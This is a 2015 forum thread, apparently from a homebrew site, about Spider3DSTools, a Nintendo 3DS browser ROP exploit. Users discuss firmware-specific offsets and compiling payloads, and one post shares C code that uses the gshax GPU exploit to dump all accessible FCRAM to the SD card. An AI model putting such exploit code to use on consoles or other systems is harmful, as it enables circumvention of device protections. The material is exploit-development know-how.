#define SP_LR_LDMFD_SP_LR_PC 0x001303A0

No 7.x or 8.x support? I've been trying to change offsets, but I can't seem to get it.

duke_srg · Feb 3, 2015

This is ROP code for different browser version actually, so 5.x version should work up to 7.0, from 7.1 9x version must be used. But the actual ARM9 code launched from code.bin must be compiled for every firmware version.

Relys · Feb 3, 2015

duke_srg said:
This is ROP code for different browser version actually, so 5.x version should work up to 7.0, from 7.1 9x version must be used. But the actual ARM9 code launched from code.bin must be compiled for every firmware version.

Don't you mean ARM11 code launched from code.bin?

Anyways, if you have userland code execution you should be able to grab the firmware version to make code.bin firmware independent. You should really submit a pull request to the git repo for all of this.

duke_srg · Feb 3, 2015

Relys said:
Don't you mean ARM11 code launched from code.bin?

Anyways, if you have userland code execution you should be able to grab the firmware version to make code.bin firmware independent. You should really submit a pull request to the git repo for all of this.

There is nothing new in my code, just a bit more comfortable to understand IMO. I'm still did not realize completely the stage 2 of the GW exploit.

Pink Gold Peach · Feb 3, 2015

Custom themes from Spider3DS yet??

Kaptain Kek · Feb 3, 2015

Pink Gold Peach said:
Custom themes from Spider3DS yet??

not yet, m'lady.

Pink Gold Peach · Feb 3, 2015

Kaptain Kek said:
not yet, m'lady.

Hopefully eventually.

rockthetemp123 · Feb 3, 2015

How do I compile a script someone has made?

DarkFlare69 · Feb 3, 2015

zakcng said:
How do I compile a script someone has made?

Install an arm-none-eabi-gcc toolchain on your PC. Name it code.c and put it in the Spider3DStools directory and open a command window. Type make.

DarkFlare69 · Feb 3, 2015

How do I dump the memory (RAM) of a game with this?

Pink Gold Peach · Feb 3, 2015

DarkFlare69 said:
How do I dump the memory (RAM) of a game with this?

I was wondering the same thing.

yifan_lu · Feb 3, 2015

This was commented out in the arm11 kernel exec branch:

Code:

    unsigned int addr;
    void *this = 0x08F10000;
    int *written = 0x08F01000;
    int *buf = 0x18410000;
    IFile_Open(this, L"dmc:/mem-fcram.bin", 6);
    // FCRAM dump
    for (addr = 0x14000000; addr < 0x1A800000; addr += 0x10000)
    {
        GSPGPU_FlushDataCache (addr, 0x10000);
        GX_SetTextureCopy (addr, buf, 0x10000, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (buf, 0x10000);
        svcSleepThread (0x400000LL);
        IFile_Write(this, written, buf, 0x10000);
    }

that lets you dump all the fcram that gshax has access to.

DarkFlare69 · Feb 3, 2015

yifan_lu said:

This was commented out in the arm11 kernel exec branch:

Code:

    unsigned int addr;
    void *this = 0x08F10000;
    int *written = 0x08F01000;
    int *buf = 0x18410000;
    IFile_Open(this, L"dmc:/mem-fcram.bin", 6);
    // FCRAM dump
    for (addr = 0x14000000; addr < 0x1A800000; addr += 0x10000)
    {
        GSPGPU_FlushDataCache (addr, 0x10000);
        GX_SetTextureCopy (addr, buf, 0x10000, 0, 0, 0, 0, 8);
        GSPGPU_FlushDataCache (buf, 0x10000);
        svcSleepThread (0x400000LL);
        IFile_Write(this, written, buf, 0x10000);
    }

that lets you dump all the fcram that gshax has access to.

Will it dump it to a file on the SD card?

Homebrew [Custom Launcher] Spider3DSTools released

Well-Known Member

Active Member

Well-Known Member

Active Member

Well-Known Member

Well-Known Member

Well-Known Member

Cold Beverage Lover

Well-Known Member

^(Software | Hardware) Exploit? Development.$

Well-Known Member

Random Person

Active Member

Random Person

Well-Known Member

Well-Known Member

Well-Known Member

Random Person

@yifanlu

Well-Known Member

Similar threads

Popular threads in this forum